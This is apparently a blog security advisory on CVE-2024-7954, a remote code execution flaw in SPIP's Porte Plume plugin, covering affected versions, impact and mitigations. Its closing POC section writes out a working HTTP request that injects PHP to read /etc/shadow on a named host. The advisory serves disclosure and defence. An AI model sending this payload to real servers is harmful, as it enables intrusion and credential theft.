SPIP Porte Plume Plugin RCE Vulnerability CVE-2024-7954

Posted on

Vulnerable Version

SPIP before 4.30-alpha2, 4.2.13, and 4.1.16

Fixed Version

SPIP 4.3.0-alpha2
SPIP 4.2.13
SPIP 4.1.16

Base Score

9.8 Critical                                                                       

CVE-2024-7954 Vendor Description: –

SPIP (Système de Publication pour l’Internet) is an open-source content management system (CMS) designed for the creation, management, and publication of web content. Initially developed for collaborative publishing, SPIP is widely used by media organizations, educational institutions, and community-driven websites due to its flexibility, ease of use, and strong focus on multi-user content editing. Written in PHP, SPIP features a structured templating system, a robust user permission model, and support for multilingual content, making it a preferred choice for dynamic web platforms.

Vulnerability Description:-

CVE-2024-7954 is a critical Remote Code Execution (RCE) vulnerability affecting the Porte Plume Plugin used in SPIP, a widely used open-source content management system. This vulnerability, present in SPIP versions prior to 4.30-alpha2, 4.2.13, and 4.1.16, allows unauthenticated remote attackers to execute arbitrary PHP code by sending a specially crafted HTTP request.

The flaw exists due to insufficient input sanitization in the porte_plume_previsu action, which processes user-submitted data for content preview. Attackers can exploit this vulnerability by injecting malicious PHP code into the HTTP request, leading to arbitrary command execution with the privileges of the SPIP user. The impact is severe, as it enables attackers to compromise the server, extract sensitive data, modify content, and pivot within the network.

Impact:-

  • Full system compromise – Attackers can execute arbitrary commands, manipulate files, and deploy further exploits.
  • Data exfiltration – Sensitive data, including user credentials, database content, and system files, can be accessed or stolen.
  • Website defacement – Malicious actors may modify website content, inject malicious scripts, or disrupt operations.
  • Privilege escalation & lateral movement – An attacker with control over the server can attempt to escalate privileges or move deeper into the network, increasing the attack scope.
  • Service disruption & ransomware deployment – Exploiting this vulnerability could lead to denial-of-service (DoS) attacks or the deployment of ransomware, crippling business operations.

Mitigations:-

Patch and Update:

  • Upgrade SPIP to 4.30-alpha2, 4.2.13, or 4.1.16 immediately, as these versions contain security patches addressing this vulnerability.

Web Application Firewall (WAF):

  • Deploy a WAF to detect and block malicious HTTP requests attempting to exploit this vulnerability.

Access Controls & Least Privilege:

  • Ensure that SPIP instances run with minimal privileges to reduce the impact of a successful attack.
  • Restrict access to the Porte Plume Plugin if it is not necessary.

Log Monitoring & Anomaly Detection:

  • Continuously monitor server logs for suspicious activity, such as unexpected system commands or unauthorized access attempts.
  • Implement Intrusion Detection Systems (IDS) to alert administrators of potential exploitation attempts.

Disable Unused Features:

  • If the Porte Plume Plugin is not actively used, disable or remove it to eliminate the attack surface.

POC:-

POST /index.php?action=porte_plume_previsu HTTP/1.1
Host: 8.221.138.111:8457
Content-Type: application/x-www-form-urlencoded
Content-Length: 57

data=AA_[->URL<?php system('cat /etc/shadow'); ?>]_BB
image 2

POC Video:-

https://www.youtube.com/watch?v=ZDf-XjAv5SE

Leave a Reply

Your email address will not be published. Required fields are marked *